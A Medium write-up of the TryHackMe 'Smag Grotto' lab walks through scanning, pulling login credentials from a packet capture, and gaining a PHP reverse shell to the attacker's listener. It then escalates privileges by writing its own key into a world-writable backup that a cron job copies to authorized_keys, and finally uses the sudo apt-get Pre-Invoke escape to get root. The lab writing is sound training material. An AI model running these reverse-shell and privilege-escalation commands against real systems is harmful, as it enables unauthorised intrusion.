TryHackMe: Smag Grotto Writeup

easy THM room smag grotto room background image

Play

1. Scanning & Enumeration

We do the below scans in parallel.

1.1. Port Scanning

Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA)
| 256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA)
|_ 256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nothing too special.

1.2. Web Enumeration

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuste-list-2.3-medium.txt -x 'php,html,txt' -t 32 -q -219
/index.php (Status: 200) [Size: 402]
/mail (Status: 301) [Size: 311] [10.10.62.219/mail/]

/mail/ looks interesting. We explore that below.

1.3. Web Exploration

homepage of smag grotto
the mail directory showing some interesting conversations and a file

We add the smag.thm line in /etc/hosts file, looking at their emails.

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.62.219 smag.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

1.4. Wireshark

The website has a file, which we can download just by clicking on it. Exploring it further.

In one of the packets, we found:

POST /login.php HTTP/1.1
Host: development.smag.thm
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
username={hidden}&password={wow_very_nice}HTTP/1.1 200 OK
Date: Wed, 03 Jun 2020 18:04:07 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Add the development.smag.thm along with smag.thm domain in the /etc/hosts file. It thus looks like the following.

┌──(kali㉿kali)-[/tmp]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.62.219 smag.thm development.smag.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

2. Foothold

Logging in using the credentials from wireshark, we get a place to enter commands.

admin page after logging in the subdomain

I tried a bunch of commands, and this one stuck: php -r '$sock=fsockopen("MY_KALI_IP",4444);exec("sh <&3 >&3 2>&3");'

We get a shell!

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.17.8.184] from (UNKNOWN) [10.10.62.219] 33886
bash -i
bash: cannot set terminal process group (707): Inappropriate ioctl for device
bash: no job control in this shell
www-data@smag:/var/www/development.smag.thm$

3. PrivEsc

Looking around, I found something intersting in /etc/crontab in the last line.

www-data@smag:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys
#

We see the file /opt/.backups/jake_id_rsa.pub.backup is put into jake’s authorized keys. This means that if I can get my own, kali SSH public key in here, I would be able to login without a password.

First, we need to make sure we have writing permissions.

www-data@smag:/$ ls -la /opt/.backups/jake_id_rsa.pub.backup
ls -la /opt/.backups/jake_id_rsa.pub.backup
-rw-rw-rw- 1 root root 563 Jun 5 2020 /opt/.backups/jake_id_rsa.pub.backup

Great! Now I copy pasted my own id_rsa.pub key here.

www-data@smag:/$ echo "ssh-rsa {wow_nice_looking_key_uh} kali@kali" > /opt/.backups/jake_id_rsa.pub.backup

And …

┌──(kali㉿kali)-[/tmp]
└─$ ssh jake@10.10.62.219
The authenticity of host '10.10.62.219 (10.10.62.219)' can't be established.
ECDSA key fingerprint is SHA256:MMv7NKmeLS/aEUSOLy0NbyGrLCEKErHJTp1cIvsxnpA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.62.219' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Fri Jun 5 10:15:15 2020
jake@smag:~$

Success!

Now for PrivEsc to root. Exploring a bit, I found:

jake@smag:~$ sudo -l
Matching Defaults entries for jake on smag:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on smag:
(ALL : ALL) NOPASSWD: /usr/bin/apt-get

Using GTFOBins — apt-get sudo exploit

jake@smag:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami
root
#

System compromised!

--

--

--

Trying out some stuff.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What Is a Servlet?

Getting Started with the Telerik SideDrawer Control in Xamarin.Forms

So, what’s the Blockchain actually is?

Kubernetes features and It's Industrial Use-cases in Modern World

**Multipurpose nature of Python** This post is aimed to be in a series.

Solved — pytube.exceptions.RegexMatchError: __init__: could not find match for ^\w+\W

How to Correctly Setup Custom Plugins of Apache Airflow

How to create a chatbot

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tanishq Chaudhary

Tanishq Chaudhary

Trying out some stuff.

More from Medium

TryHackMe | RootMe | Walkthrough | Detailed Write Up

TryHackMe | RootMe | Walkthrough |Detailed Write Up | MZS

HTB — Forge Walkthroughs

[EN] TryHackMe 25 Days of Cyber Security: Day 13 Walkthrough